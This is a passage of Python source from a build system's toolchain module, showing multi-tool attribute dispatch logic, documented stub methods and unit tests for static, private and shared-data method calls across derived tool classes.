sentinel\n\t\t\t\t\t\t\t\t\tfor cls2 in cls.mro():\n\t\t\t\t\t\t\t\t\t\tif name in cls2.__dict__:\n\t\t\t\t\t\t\t\t\t\t\tval = cls2.__dict__[name]\n\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\tassert val is not sentinel, \"this shouldn't happen\"\n\t\t\t\t\t\t\t\t\tif isinstance(val, property):\n\t\t\t\t\t\t\t\t\t\t# pylint: disable=no-member\n\t\t\t\t\t\t\t\t\t\treturn val.__get__(self)\n\t\t\t\t\t\t\t\t\tif isinstance(val, (staticmethod, classmethod)):\n\t\t\t\t\t\t\t\t\t\t# pylint: disable=no-member\n\t\t\t\t\t\t\t\t\t\treturn val.__get__(cls)\n\t\t\t\t\t\t\t\t\tif isinstance(val, (types.FunctionType, types.MethodType)):\n\t\t\t\t\t\t\t\t\t\tassert runInit, \"Cannot call non-static methods of class {} from this context!\".format(cls.__name__)\n\t\t\t\t\t\t\t\t\t\treturn types.MethodType(val, self)\n\t\t\t\t\t\t\t\t\treturn val\n\n\t\t\t\t\t\t\t\tif hasattr(object, name) or hasattr(ToolClass, name):\n\t\t\t\t\t\t\t\t\treturn object.__getattribute__(self, name)\n\t\t\t\t\t\t\t\traise AttributeError(\"'{}' object has no attribute '{}'\".format(cls.__name__, name))\n\n\t\t\t\t\t\t\t# For public variables we want to return a wrapper function that calls all\n\t\t\t\t\t\t\t# matching functions. This should definitely be a function. If it's not a function,\n\t\t\t\t\t\t\t# things will not work.\n\t\t\t\t\t\t\tdef _runMultiFunc(*args, **kwargs):\n\t\t\t\t\t\t\t\tfunctions = {}\n\n\t\t\t\t\t\t\t\t# Iterate through all classes and collect functions that match this name\n\t\t\t\t\t\t\t\t# We'll keep a list of all the functions that match, but only call each matching\n\t\t\t\t\t\t\t\t# function once. And when we call it we'll use the most base class we find that\n\t\t\t\t\t\t\t\t# has it - which should be the one that defined it - and only call each one once\n\t\t\t\t\t\t\t\t# (so if there are two subclasses of a base that base's functions won't get called twice)\n\t\t\t\t\t\t\t\tif limit:\n\t\t\t\t\t\t\t\t\tclasses = limit\n\t\t\t\t\t\t\t\t\tif shared_globals.runMode == shared_globals.RunMode.GenerateSolution:\n\t\t\t\t\t\t\t\t\t\tfor cls in _classTrackr.classes:\n\t\t\t\t\t\t\t\t\t\t\tif cls in shared_globals.allGeneratorTools:\n\t\t\t\t\t\t\t\t\t\t\t\tclasses.add(cls)\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tclasses = _classTrackr.classes\n\t\t\t\t\t\t\t\tfor cls in classes:\n\t\t\t\t\t\t\t\t\tif hasattr(cls, name):\n\t\t\t\t\t\t\t\t\t\t# Have to use __dict__ instead of getattr() because otherwise we can't identify static methods\n\t\t\t\t\t\t\t\t\t\t# See http://stackoverflow.com/questions/14187973/python3-check-if-method-is-static\n\t\t\t\t\t\t\t\t\t\tfunc = None\n\t\t\t\t\t\t\t\t\t\tfor cls2 in cls.mro():\n\t\t\t\t\t\t\t\t\t\t\tif name in cls2.__dict__:\n\t\t\t\t\t\t\t\t\t\t\t\tfunc = cls2.__dict__[name]\n\t\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\t\tassert func is not None, \"this shouldn't happen\"\n\t\t\t\t\t\t\t\t\t\tif func not in functions or issubclass(functions[func], cls):\n\t\t\t\t\t\t\t\t\t\t\tfunctions[func] = cls\n\n\t\t\t\t\t\t\t\t# Having collected all functions, iterate and call them\n\t\t\t\t\t\t\t\tfor func, cls in functions.items():\n\t\t\t\t\t\t\t\t\twith Use(cls):\n\t\t\t\t\t\t\t\t\t\tfunc.__get__(cls)(*args, **kwargs)\n\n\t\t\t\t\t\t\thasNonFunc = False\n\t\t\t\t\t\t\tif limit:\n\t\t\t\t\t\t\t\tclasses = limit\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tclasses = _classTrackr.classes\n\t\t\t\t\t\t\tfound = False\n\t\t\t\t\t\t\tfor cls in classes:\n\t\t\t\t\t\t\t\tif hasattr(cls, name):\n\t\t\t\t\t\t\t\t\t# Have to use __dict__ instead of getattr() because otherwise we can't identify static methods\n\t\t\t\t\t\t\t\t\t# See http://stackoverflow.com/questions/14187973/python3-check-if-method-is-static\n\t\t\t\t\t\t\t\t\tfunc = None\n\t\t\t\t\t\t\t\t\tfound = True\n\t\t\t\t\t\t\t\t\tfor cls2 in cls.mro():\n\t\t\t\t\t\t\t\t\t\tif name in cls2.__dict__:\n\t\t\t\t\t\t\t\t\t\t\tfunc = cls2.__dict__[name]\n\t\t\t\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\t\t\t\tassert func is not None, \"this shouldn't happen\"\n\t\t\t\t\t\t\t\t\tif isinstance(func, (types.FunctionType, types.MethodType, property)):\n\t\t\t\t\t\t\t\t\t\traise InvalidFunctionCall(\n\t\t\t\t\t\t\t\t\t\t\t\"Function call is invalid. '{}' is an instance method and is being called on a toolchain with more than one tool in its view. \"\n\t\t\t\t\t\t\t\t\t\t\t\"Only staticmethods and classmethods are automatically bundled, non-static methods must be called with toolchain.Tool(FooTool).BarMethod()\"\n\t\t\t\t\t\t\t\t\t\t\t.format(name)\n\t\t\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\t\tif not isinstance(func, staticmethod) and not isinstance(func, classmethod):\n\t\t\t\t\t\t\t\t\t\thasNonFunc = True\n\n\t\t\t\t\t\t\tif hasNonFunc:\n\t\t\t\t\t\t\t\tvalues = {}\n\t\t\t\t\t\t\t\tfor cls in classes:\n\t\t\t\t\t\t\t\t\tif hasattr(cls, name):\n\t\t\t\t\t\t\t\t\t\t# Have to use __dict__ instead of getattr() because otherwise we can't identify static methods\n\t\t\t\t\t\t\t\t\t\t# See http://stackoverflow.com/questions/14187973/python3-check-if-method-is-static\n\t\t\t\t\t\t\t\t\t\tval = None\n\t\t\t\t\t\t\t\t\t\tclsContainingVal = None\n\t\t\t\t\t\t\t\t\t\tfor cls2 in cls.mro():\n\t\t\t\t\t\t\t\t\t\t\tif name in cls2.__dict__:\n\t\t\t\t\t\t\t\t\t\t\t\tval = cls2.__dict__[name]\n\t\t\t\t\t\t\t\t\t\t\t\tclsContainingVal = cls2\n\t\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\t\tassert val is not None, \"this shouldn't happen\"\n\t\t\t\t\t\t\t\t\t\tif clsContainingVal in values:\n\t\t\t\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\t\t\t\tif values:\n\t\t\t\t\t\t\t\t\t\t\traise AttributeError(\n\t\t\t\t\t\t\t\t\t\t\t\t\"Toolchain attribute {} is ambiguous (exists on multiple tools). Try accessing on the class directly, or through toolchain.Tool(class)\".format(name)\n\t\t\t\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\t\t\tvalues[clsContainingVal] = val\n\t\t\t\t\t\t\t\treturn values.popitem()[1]\n\n\t\t\t\t\t\t\t# Finding one tool without this function present on it is not an error.\n\t\t\t\t\t\t\t# However, if no tools had this function, that is an error - let python internals\n\t\t\t\t\t\t\t# throw us an AttributeError\n\t\t\t\t\t\t\tif not found:\n\t\t\t\t\t\t\t\treturn object.__getattribute__(self, name)\n\n\t\t\t\t\t\t\treturn _runMultiFunc\n\n\t\t\twith perf_timer.PerfTimer(\"Final toolchain creation\"):\n\t\t\t\treturn type(PlatformString(\"Toolchain\"), classes, dict(ToolchainTemplate.__dict__))()\n\n\t################################################################################\n\t################################################################################\n\t### Stub functions for the sake of making code complete work. ###\n\t### See above for actually implementations in ToolchainTemplate. ###\n\t################################################################################\n\t################################################################################\n\n\t# pylint: disable=redundant-returns-doc\n\[email protected]\n\t@TypeChecked(tool=(_classType, _typeType))\n\tdef Use(self, tool):\n\t\t\"\"\"\n\t\tEnter a tool context, must be called before calling any functions that were directly pulled from the tool.\n\t\ti.e.,::\n\t\t\twith toolchain.Use(tool):\n\t\t\t\ttool.Run(toolchain, *args)\n\t\t:param tool: The tool context to enter\n\t\t:type tool: type\n\t\t:returns: Context manager to be used with a 'with' statement\n\t\t:rtype: context manager\n\t\t\"\"\"\n\t\tpass\n\n\t@TypeChecked(tool=(_classType, _typeType))\n\tdef CreateReachability(self, tool):\n\t\t\"\"\"\n\t\tCreate reachability info for a tool as it's about to be used.\n\t\tThe tool does not have to actively be in the task queue, this should be called every time an input\n\t\tis assigned to a tool, whether it's being processed immediately or being marked as pending.\n\t\t:param tool: The tool to mark reachability for\n\t\t:type tool: type\n\t\t\"\"\"\n\t\tpass\n\n\t@TypeChecked(tool=(_classType, _typeType))\n\tdef ReleaseReachability(self, tool):\n\t\t\"\"\"\n\t\tReleases reachability info for a tool, marking one instance of the tool finished.\n\t\tNote that for group inputs, this should be released as many times as it was created (i.e., if every\n\t\tinput called CreateReachability, then it needs to also be released once per input)\n\t\t:param tool: The tool to release reachability for\n\t\t:type tool: type\n\t\t\"\"\"\n\t\tpass\n\n\tdef HasAnyReachability(self):\n\t\t\"\"\"\n\t\tCheck if any builds have started that didn't finish, if anything at all is reachable.\n\t\t:return: True if reachable, False otherwise\n\t\t:rtype: bool\n\t\t\"\"\"\n\t\tpass\n\n\t@TypeChecked(extension=String)\n\tdef IsOutputActive(self, extension):\n\t\t\"\"\"\n\t\tCheck whether an output of the given extension is capable of being generated.\n\t\t:param extension:\n\t\t:type extension: str, bytes\n\t\t:return: Whether or not the input is active\n\t\t:rtype: bool\n\t\t\"\"\"\n\n\t@TypeChecked(tool=(_classType, _typeType), extension=String)\n\tdef CanCreateOutput(self, tool, extension):\n\t\t\"\"\"\n\t\tCheck whether a tool is capable of ever creating a given output, even indirectly through other tools\n\t\t:param tool: The tool to check\n\t\t:type tool: type\n\t\t:param extension: The extension to check\n\t\t:type extension: str, bytes\n\t\t:return: Whether or not the tool can create that output\n\t\t:rtype: bool\n\t\t\"\"\"\n\n\tdef GetAllTools(self):\n\t\t\"\"\"\n\t\tGet the full list of tools in this toolchain\n\t\t:return: Tool list\n\t\t:rtype: ordered_set.OrderedSet\n\t\t\"\"\"\n\t\tpass\n\n\tdef GetActiveTools(self):\n\t\t\"\"\"\n\t\tGet the full list of active tools in this toolchain\n\t\t:return: Tool list\n\t\t:rtype: ordered_set.OrderedSet\n\t\t\"\"\"\n\t\tpass\n\n\t@TypeChecked(tool=(_typeType, _classType))\n\tdef DeactivateTool(self, tool):\n\t\t\"\"\"\n\t\tRemove the specified tool from the active tool list. This is used internally when processing\n\t\tnull tools to ensure they don't get processed multiple times. You should NOT use this in a\n\t\tmakefile - instead, you should use RemoveTool\n\n\t\t:param tool: tool to remove\n\t\t:type tool: type\n\t\t\"\"\"\n\t\tpass\n\n\t@TypeChecked(tool=(_typeType, _classType))\n\tdef IsToolActive(self, tool):\n\t\t\"\"\"\n\t\tReturn whether or not the specified tool is active\n\n\t\t:param tool: tool to remove\n\t\t:type tool: type\n\t\t:return: Whether or not the tool is active\n\t\t:rtype: bool\n\t\t\"\"\"\n\t\tpass\n\n\t@TypeChecked(extension=String, generatingTools=(set, type(None)))\n\tdef GetToolsFor(self, extension, generatingTools=None):\n\t\t\"\"\"\n\t\tGet all tools that take a given input. If any generatingTools are specified, they will be excluded from the result.\n\n\t\t:param extension: The extension of the file to be fed to the new tools\n\t\t:type extension: str, bytes\n\t\t:param generatingTools: The tools that generated this input\n\t\t:type generatingTools: set[class] or None\n\t\t:return: A set of all tools that can take this input as group or individual inputs.\n\t\t\tIt's up to the caller to inspect the object to determine which type of input to provide.\n\t\t\tIt's also up to the caller to not call group input tools until IsOutputActive() returns False\n\t\t\tfor ALL of that tool's group inputs.\n\t\t:rtype: set[type]\n\t\t\"\"\"\n\t\tpass\n\n\t@TypeChecked(extension=String, generatingTools=(set, type(None)))\n\tdef GetGroupToolsFor(self, extension, generatingTools=None):\n\t\t\"\"\"\n\t\tGet all tools that take a given group input. If any generatingTools are specified, they will be excluded from the result.\n\n\t\t:param extension: The extension of the file to be fed to the new tools\n\t\t:type extension: str, bytes\n\t\t:param generatingTools: The tool that generated this input\n\t\t:type generatingTools: set[class] or None\n\t\t:return: A set of all tools that can take this input as group or individual inputs.\n\t\t\tIt's up to the caller to inspect the object to determine which type of input to provide.\n\t\t\tIt's also up to the caller to not call group input tools until IsOutputActive() returns False\n\t\t\tfor ALL of that tool's group inputs.\n\t\t:rtype: set[type]\n\t\t\"\"\"\n\t\tpass\n\n\t@TypeChecked(_return=set)\n\tdef GetSearchExtensions(self):\n\t\t\"\"\"\n\t\tReturn the full list of all extensions handled as inputs by any tool in the toolchain.\n\t\t:return: Set of all extensions\n\t\t:rtype: set[String]\n\t\t\"\"\"\n\t\tpass\n\n\tdef Tool(self, *args):\n\t\t\"\"\"\n\t\tObtain a LimitView object that allows functions to be run only on specific tools\n\n\t\t:param args: List of classes to limit function execution on\n\t\t:type args: class\n\t\t:return: limit view object\n\t\t:rtype: LimitView\n\t\t\"\"\"\n\t\tpass\n\n\t@TypeChecked(tool=(_typeType, _classType))\n\tdef AddTool(self, tool):\n\t\t\"\"\"\n\t\tAdd a new tool to the toolchain. This can only be used by a toolchain initialized with\n\t\trunInit = False to add that tool to the static method resolution; a toolchain initialized\n\t\twith runInit = True is finalized and cannot have new tools added to it\n\n\t\t:param tool: Class inheriting from Tool\n\t\t:type tool: type\n\t\t\"\"\"\n\t\tpass\n\n\t@TypeChecked(tool=(_typeType, _classType))\n\tdef RemoveTool(self, tool):\n\t\t\"\"\"\n\t\tRemoves a tool from the toolchain. This can be used in a makefile to remove tools within\n\t\tcertain contexts, such as on a specific platform, or to remove default tools, such as\n\t\tthe built-in C++ linker tools.\n\n\t\t:param tool: Class inheriting from Tool\n\t\t:type tool: type\n\t\t\"\"\"\n\t\tpass\n\n\t@TypeChecked(extension=String, checker=CompileChecker)\n\tdef AddChecker(self, extension, checker):\n\t\t\"\"\"\n\t\tAdd a compile checker for a given extension.\n\n\t\t:param extension: The extension this checker applies to\n\t\t:type extension: str\n\t\t:param checker: The CompileChecker instance to be used for files with this extension\n\t\t:type checker: CompileChecker\n\t\t\"\"\"\n\t\tpass\n\n\t@TypeChecked(extension=String)\n\tdef GetChecker(self, extension):\n\t\t\"\"\"\n\t\tGet the checker for a given extension. If none has been registered, returns a default CompileChecker instance\n\n\t\t:param extension: The extension to check\n\t\t:type extension: str\n\t\t:return: The checker to use\n\t\t:rtype: CompileChecker\n\t\t\"\"\"\n\t\tpass\n\nclass TestToolchainMixin(testcase.TestCase):\n\t\"\"\"Test the toolchain mixin\"\"\"\n\t# pylint: disable=invalid-name\n\n\tdef setUp(self):\n\t\t\"\"\"Test the toolchain mixin\"\"\"\n\t\t# pylint: disable=missing-docstring\n\t\tglobal staticInitsRun\n\t\tstaticInitsRun = set()\n\t\t# pylint: disable=protected-access\n\t\tToolClass._initialized = False\n\n\t\tself.maxDiff = None\n\n\t\tclass _sharedLocals(object):\n\t\t\tbaseInitialized = 0\n\t\t\tderived1Initialized = 0\n\t\t\tderived2Initialized = 0\n\t\t\tbaseStaticInitialized = 0\n\t\t\tderived1StaticInitialized = 0\n\t\t\tderived2StaticInitialized = 0\n\t\t\tdoBaseThingCalledInBase = 0\n\t\t\tdoBaseThing2CalledInBase = 0\n\t\t\toverloadFnCalledInBase = 0\n\t\t\toverloadFnCalledInDerived1 = 0\n\t\t\toverloadFnCalledInDerived2 = 0\n\t\t\tsetSomeValCalledInBase = 0\n\t\t\tbaseInternalThingCalledInBase = 0\n\t\t\tbasePrivateThingCalledInBase = 0\n\t\t\tderived1AccessSomeValResult = None\n\t\t\tderived1AccessTestResult = None\n\t\t\tderived2AccessSomeValResult = None\n\t\t\tderived2AccessTestResult = None\n\t\t\tderived1PrivateThingCalled = 0\n\t\t\tderived1SameNameThingCalled = 0\n\t\t\tderived2PrivateThingCalled = 0\n\t\t\tderived2SameNameThingCalled = 0\n\t\t\tdoDerived1ThingCalled = 0\n\t\t\tdoDerived2ThingCalled = 0\n\t\t\tdoBaseThingCalledInDerived2 = 0\n\t\t\tbaseInternalThingCalledInDerived1 = 0\n\t\t\tbasePrivateThingCalledInDerived2 = 0\n\t\t\tdoMultiThingCalledInDerived1 = 0\n\t\t\tdoMultiThingCalledInDerived2 = 0\n\t\t\tderived1Static = 0\n\t\t\tderived2Static = 0\n\n\n\t\tclass _base(ToolClass):\n\t\t\tinputFiles = None\n\t\t\toutputFiles = {\"\"}\n\n\t\t\tclass MyEnum(object):\n\t\t\t\t\"\"\"Demo enum class\"\"\"\n\t\t\t\tFoo = 1\n\t\t\t\tBar = 2\n\n\t\t\ttestStaticVar = 3\n\n\t\t\tdef __init__(self, projectSettings):\n\t\t\t\t_sharedLocals.baseInitialized += 1\n\t\t\t\tself._someval = 0\n\t\t\t\tToolClass.__init__(self, projectSettings)\n\n\t\t\t@staticmethod\n\t\t\tdef __static_init__():\n\t\t\t\tToolClass.__static_init__()\n\t\t\t\t_sharedLocals.baseStaticInitialized += 1\n\n\t\t\tdef Run(self, inputProject, inputFile):\n\t\t\t\tpass\n\n\t\t\t@staticmethod\n\t\t\tdef DoBaseThing():\n\t\t\t\t_sharedLocals.doBaseThingCalledInBase += 1\n\n\t\t\t@staticmethod\n\t\t\tdef DoBaseThing2():\n\t\t\t\t_sharedLocals.doBaseThing2CalledInBase += 1\n\n\t\t\t@staticmethod\n\t\t\tdef OverloadedFn():\n\t\t\t\t_sharedLocals.overloadFnCalledInBase += 1\n\n\t\t\tdef SetSomeVal(self):\n\t\t\t\t_sharedLocals.setSomeValCalledInBase += 1\n\t\t\t\tself._someval = 12345\n\n\t\t\tdef _baseInternalThing(self):\n\t\t\t\t_sharedLocals.baseInternalThingCalledInBase += 1\n\n\t\t\tdef _basePrivateThing(self):\n\t\t\t\tself._baseInternalThing()\n\t\t\t\t_sharedLocals.basePrivateThingCalledInBase += 1\n\n\n\t\tclass _derived1(_base):\n\t\t\tdef __init__(self, projectSettings):\n\t\t\t\t_sharedLocals.derived1Initialized += 1\n\t\t\t\tself._test = 1\n\t\t\t\t_base.__init__(self, projectSettings)\n\n\t\t\t@staticmethod\n\t\t\tdef __static_init__():\n\t\t\t\t_base.__static_init__()\n\t\t\t\t_sharedLocals.derived1StaticInitialized += 1\n\n\t\t\tdef Derived1CallInternals(self):\n\t\t\t\tself._basePrivateThing()\n\t\t\t\tself._derived1PrivateThing()\n\t\t\t\tself._sameNamePrivateThing()\n\n\t\t\tdef Derived1AccessSomeVal(self):\n\t\t\t\t_sharedLocals.derived1AccessSomeValResult = self._someval\n\t\t\t\t_sharedLocals.derived1AccessTestResult = self._test\n\n\t\t\t@staticmethod\n\t\t\tdef OverloadedFn():\n\t\t\t\t_sharedLocals.overloadFnCalledInDerived1 += 1\n\n\t\t\tdef _baseInternalThing(self):\n\t\t\t\t_sharedLocals.baseInternalThingCalledInDerived1 += 1\n\n\t\t\tdef _derived1PrivateThing(self):\n\t\t\t\t_sharedLocals.derived1PrivateThingCalled += 1\n\n\t\t\tdef _sameNamePrivateThing(self):\n\t\t\t\t_sharedLocals.derived1SameNameThingCalled += 1\n\n\t\t\t@staticmethod\n\t\t\tdef DoDerived1Thing():\n\t\t\t\t_sharedLocals.doDerived1ThingCalled += 1\n\n\t\t\t@staticmethod\n\t\t\tdef DoMultiThing():\n\t\t\t\t_sharedLocals.doMultiThingCalledInDerived1 += 1\n\n\t\t\t@staticmethod\n\t\t\tdef Derived1Static():\n\t\t\t\t_sharedLocals.derived1Static += 1\n\n\t\tclass _derived2(_base):\n\t\t\tdef __init__(self, projectSettings):\n\t\t\t\t_sharedLocals.derived2Initialized += 1\n\t\t\t\tself._test = 2\n\t\t\t\t_base.__init__(self, projectSettings)\n\n\t\t\t@staticmethod\n\t\t\tdef __static_init__():\n\t\t\t\t_base.__static_init__()\n\t\t\t\t_sharedLocals.derived2StaticInitialized += 1\n\n\t\t\tdef Derived2CallInternals(self):\n\t\t\t\tself._basePrivateThing()\n\t\t\t\tself._derived2PrivateThing()\n\t\t\t\tself._sameNamePrivateThing()\n\n\t\t\tdef Derived2AccessSomeVal(self):\n\t\t\t\t_sharedLocals.derived2AccessSomeValResult = self._someval\n\t\t\t\t_sharedLocals.derived2AccessTestResult = self._test\n\n\t\t\t@staticmethod\n\t\t\tdef OverloadedFn():\n\t\t\t\t_sharedLocals.overloadFnCalledInDerived2 += 1\n\n\t\t\t@staticmethod\n\t\t\tdef DoBaseThing():\n\t\t\t\t_sharedLocals.doBaseThingCalledInDerived2 += 1\n\n\t\t\tdef Derived2SetSomeVal(self):\n\t\t\t\tself._someval = 54321\n\n\t\t\tdef _basePrivateThing(self):\n\t\t\t\tself._baseInternalThing()\n\t\t\t\t_sharedLocals.basePrivateThingCalledInDerived2 += 1\n\n\t\t\tdef _derived2PrivateThing(self):\n\t\t\t\t_sharedLocals.derived2PrivateThingCalled += 1\n\n\t\t\tdef _sameNamePrivateThing(self):\n\t\t\t\t_sharedLocals.derived2SameNameThingCalled += 1\n\n\t\t\t@staticmethod\n\t\t\tdef DoDerived2Thing():\n\t\t\t\t_sharedLocals.doDerived2ThingCalled += 1\n\n\t\t\t@staticmethod\n\t\t\tdef DoMultiThing():\n\t\t\t\t_sharedLocals.doMultiThingCalledInDerived2 += 1\n\n\t\t\t@staticmethod\n\t\t\tdef Derived2Static():\n\t\t\t\t_sharedLocals.derived2Static += 1\n\n\t\tself.expectedState = {key: val for key, val in _sharedLocals.__dict__.items() if not key.startswith(\"_\")}\n\t\tself._sharedLocals = _sharedLocals\n\t\tself._derived1 = _derived1\n\t\tself._derived2 = _derived2\n\t\tself._base = _base\n\n\t\tself.mixin = Toolchain({}, _derived1, _derived2)\n\t\tself.assertChanged(\n\t\t\tbaseInitialized=1,\n\t\t\tderived1Initialized=1,\n\t\t\tderived2Initialized=1,\n\t\t\tbaseStaticInitialized=1,\n\t\t\tderived1StaticInitialized=1,\n\t\t\tderived2StaticInitialized=1,\n\t\t)\n\n\tdef assertUnchanged(self):\n\t\t\"\"\"Assert that the state dict has not changed\"\"\"\n\t\t#Set the expected changes on our expected state and assert that the changed expected state\n\t\t#(including the previous values in that state) matches the actual state\n\t\tactualState = {key: val for key, val in self._sharedLocals.__dict__.items() if not key.startswith(\"_\")}\n\t\tself.assertEqual(self.expectedState, actualState)\n\n\tdef assertChanged(self, **kwargs):\n\t\t\"\"\"Assert that the listed changes (and ONLY the listed changes) have occurred in the state dict\"\"\"\n\t\t#Set the expected changes on our expected state and assert that the changed expected state\n\t\t#(including the previous values in that state) matches the actual state\n\t\tfor key, val in kwargs.items():\n\t\t\tself.assertNotEqual(self.expectedState[key], val)\n\t\tself.expectedState.update(kwargs)\n\t\tactualState = {key: val for key, val in self._sharedLocals.__dict__.items() if not key.startswith(\"_\")}\n\t\tself.assertEqual(self.expectedState, actualState)\n\n\tdef testStaticFunctionCalls(self):\n\t\t\"\"\"Test that static method calls with runInit=False work correctly\"\"\"\n\t\tmixin2 = Toolchain({}, self._derived1, runInit=False)\n\t\tmixin2.AddTool(self._derived2)\n\n\t\tself.assertEqual(mixin2.MyEnum.Foo, 1)\n\t\tself.assertEqual(mixin2.MyEnum.Bar, 2)\n\t\tself.assertEqual(mixin2.testStaticVar, 3)\n\n\t\t#Assert init ran once - during setUp - and only once.\n\t\t#i.e., mixin2 should not have run init!\n\t\tself.assertEqual(1, self._sharedLocals.baseInitialized)\n\t\tself.assertEqual(1, self._sharedLocals.derived1Initialized)\n\t\tself.assertEqual(1, self._sharedLocals.derived2Initialized)\n\t\tmixin2.Derived1Static()\n\t\tself.assertChanged(derived1Static = 1)\n\t\tmixin2.Derived2Static()\n\t\tself.assertChanged(derived2Static = 1)\n\n\tdef testPrivateFunctionCalls(self):\n\t\t\"\"\"Test that internal private function calls work with a variety of inheritance scenarios\"\"\"\n\t\t# Call internal functions on derived 1\n\t\t# This should call _basePrivateThing on the base class and _baseInternalThing on the child\n\t\t# And it should call Derived1PrivateThing on Derived1\n\t\t# And it should call the function named _sameNamePrivateThing defined in Derived1, but NOT the one defined in Derived2\n\t\tself.mixin.Tool(self._derived1).Derived1CallInternals()\n\n\t\tself.assertChanged(\n\t\t\tbasePrivateThingCalledInBase=1,\n\t\t\tderived1PrivateThingCalled=1,\n\t\t\tderived1SameNameThingCalled=1,\n\t\t\tbaseInternalThingCalledInDerived1=1\n\t\t)\n\n\t\t# Call internal functions on derived 2\n\t\t# This should call _basePrivateThing on the derived class and _baseInternalThing on the base\n\t\t# And it should call Derived2PrivateThing on Derived2\n\t\t# And it should call the function named _sameNamePrivateThing defined in Derived2, but NOT the one defined in Derived1\n\t\tself.mixin.Tool(self._derived2).Derived2CallInternals()\n\n\t\tself.assertChanged(\n\t\t\tbaseInternalThingCalledInBase=1,\n\t\t\tderived2PrivateThingCalled=1,\n\t\t\tderived2SameNameThingCalled=1,\n\t\t\tbasePrivateThingCalledInDerived2=1\n\t\t)\n\n\tdef testMultiFunctionCall(self):\n\t\t\"\"\"Test that calling a function with multiple implementations calls all implementations\"\"\"\n\t\t# This should call the functioned defined on the base class by way of Derived1\n\t\t# as well as the overload defined on Derived2\n\t\tself.mixin.DoBaseThing()\n\n\t\tself.assertChanged(\n\t\t\tdoBaseThingCalledInBase=1,\n\t\t\tdoBaseThingCalledInDerived2=1\n\t\t)\n\n\tdef testFunctionCallDeduplication(self):\n\t\t\"\"\"Test that a given function implementation is only called once\"\"\"\n\t\t# This should call DoBaseThing2 on the base class and should only call it ONCE\n\t\tself.mixin.DoBaseThing2()\n\n\t\tself.assertChanged(\n\t\t\tdoBaseThing2CalledInBase=1\n\t\t)\n\n\tdef testBaseClassFunctionNotCalledIfOverloaded(self):\n\t\t\"\"\"Test that a base class implementation is not called if all derived classes override it\"\"\"\n\t\t# This should call the overloaded functions on both Derived1 and Derived2 and should NOT call the base implementation\n\t\tself.mixin.Tool(self._derived1).OverloadedFn()\n\t\tself.mixin.Tool(self._derived2).OverloadedFn()\n\n\t\tself.assertChanged(\n\t\t\toverloadFnCalledInDerived1=1,\n\t\t\toverloadFnCalledInDerived2=1\n\t\t)\n\n\tdef testAccessSharedData(self):\n\t\t\"\"\"Test that accessing data initialized by the base class accesses shared data, and\n\t\tthat accessing data initialized by the child class is isolated from other classes using the same name\"\"\"\n\t\t# This should access self._someVal and self._test in Derived1 as set up by their constructors\n\t\t# self._test should be 1 because it should see the Derived1 instance of it, and not the Derived2 instance\n\t\tself.mixin.Tool(self._derived1).Derived1AccessSomeVal()\n\n\t\tself.assertChanged(\n\t\t\tderived1AccessSomeValResult=0,\n\t\t\tderived1AccessTestResult=1\n\t\t)\n\n\t\t# This should access self._someVal and self._test in Derived2 as set up by their constructors\n\t\t# self._test should be 2 because it should see the Derived2 instance of it, and not the Derived1 instance\n\t\tself.mixin.Tool(self._derived2).Derived2AccessSomeVal()\n\n\t\tself.assertChanged(\n\t\t\tderived2AccessSomeValResult=0,\n\t\t\tderived2AccessTestResult=2\n\t\t)\n\n\tdef testChangeSharedDataInBase(self):\n\t\t\"\"\"Test that changes to shared data by the base class are seen by all children\"\"\"\n\t\t# Set self._someVal to 12345 in the base class. This should affect both child classes\n\t\tself.mixin.Tool(self._base).SetSomeVal()\n\n\t\tself.assertChanged(\n\t\t\tsetSomeValCalledInBase=1,\n\t\t)\n\n\t\t# Access values again via Derived1. self.someVal should be 12345 now.\n\t\tself.mixin.Tool(self._derived1).Derived1AccessSomeVal()\n\n\t\tself.assertChanged(\n\t\t\tderived1AccessSomeValResult=12345,\n\t\t\tderived1AccessTestResult=1,\n\t\t)\n\n\t\t# Access values again via Derived2. Just like with Derived1, self.someVal should be 12345 now.\n\t\tself.mixin.Tool(self._derived2).Derived2AccessSomeVal()\n\n\t\tself.assertChanged(\n\t\t\tderived2AccessSomeValResult=12345,\n\t\t\tderived2AccessTestResult=2,\n\t\t)\n\n\tdef testCallNonStaticMethodWithoutLimitViewThrows(self):\n\t\t\"\"\"Test that trying to call an instance method without defining a single class for scope throws an exception\"\"\"\n\t\twith self.assertRaises(InvalidFunctionCall):\n\t\t\tself.mixin.SetSomeVal()\n\n\t\twith self.assertRaises(InvalidFunctionCall):\n\t\t\tself.mixin.Derived1AccessSomeVal()\n\n\tdef testChangeSharedDataInDerived(self):\n\t\t\"\"\"Test that changes to shared data by a derived class are seen by other derived classes\"\"\"\n\t\t# Set SomeVal by way of Derived2, which despite being a child class should still set the base class instance\n\t\tself.mixin.Tool(self._derived2).Derived2SetSomeVal()\n\n\t\t# Access values again via Derived1. self.someVal should be 54321 now as set by Derived2.\n\t\tself.mixin.Tool(self._derived1).Derived1AccessSomeVal()\n\n\t\tself.assertChanged(\n\t\t\tderived1AccessSomeValResult=54321,\n\t\t\tderived1AccessTestResult=1,\n\t\t)\n\n\t\t# Access values again via Derived2. Just like with Derived1, self.someVal should be 54321 now.\n\t\tself.mixin.Tool(self._derived2).Derived2AccessSomeVal()\n\n\t\tself.assertChanged(\n\t\t\tderived2AccessSomeValResult=54321,\n\t\t\tderived2AccessTestResult=2,\n\t\t)\n\n\tdef testFunctionsImplementedOnlyInOneClass(self):\n\t\t\"\"\"Test that functions work correctly even if not all tools support it\"\"\"\n\t\t# Call a function defined only in Derived1 and not in the base class\n\t\tself.mixin.Tool(self._derived1).DoDerived1Thing()\n\n\t\tself.assertChanged(\n\t\t\tdoDerived1ThingCalled=1,\n\t\t)\n\n\t\t# Call a function defined only in Derived2 and not in the base class\n\t\tself.mixin.Tool(self._derived2).DoDerived2Thing()\n\n\t\tself.assertChanged(\n\t\t\tdoDerived2ThingCalled=1,\n\t\t)\n\n\tdef testLimitByTool(self):\n\t\t\"\"\"Test that the Tool() function correctly limits a function call to only the specified 